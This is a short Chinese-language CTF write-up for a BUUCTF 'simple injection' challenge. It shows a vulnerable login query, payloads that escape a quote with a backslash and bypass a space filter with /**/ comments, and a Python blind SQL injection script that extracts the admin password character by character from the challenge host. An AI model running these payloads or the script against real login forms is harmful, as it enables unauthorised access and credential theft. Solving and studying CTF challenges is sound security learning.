简单注入
hint.txt拿到数据库查询代码:
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
这个 就比较好分析了,提交参数username时,使用反斜杠注释单引号,使用注释绕过空格过滤:
username=admin\&password=/**/or/**/1>0#
username=admin\&password=/**/or/**/1<0#
执行两段话可以得到不一样的回显,很容易想到可以用盲注。
import requests
url = "http://0dafba8b-3cf1-4b74-9b9a-9195b5f5e6b0.node3.buuoj.cn/index.php"
def submit1():
data = {"username": "admin\\", "password": ""}
result = ""
i = 0
while True:
i = i + 1
for j in range(32, 128):
payload = "or/**/if(ascii(substr(password,%d,1))<%d,1,0)#" % (i, j)
data['password'] = payload
response = requests.post(url=url, data=data)
if "stronger" in response.text:
result += chr(j - 1)
print(payload)
print(result)
break
else:
if j == 127:
return result
def submit2():
data = {"username": "admin\\", "password": ""}
result = ""
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)
data['password'] = payload
response = requests.post(url=url, data=data)
if "stronger" in response.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
return result
if __name__ == "__main__":
print(submit1())
Last modified 8mo ago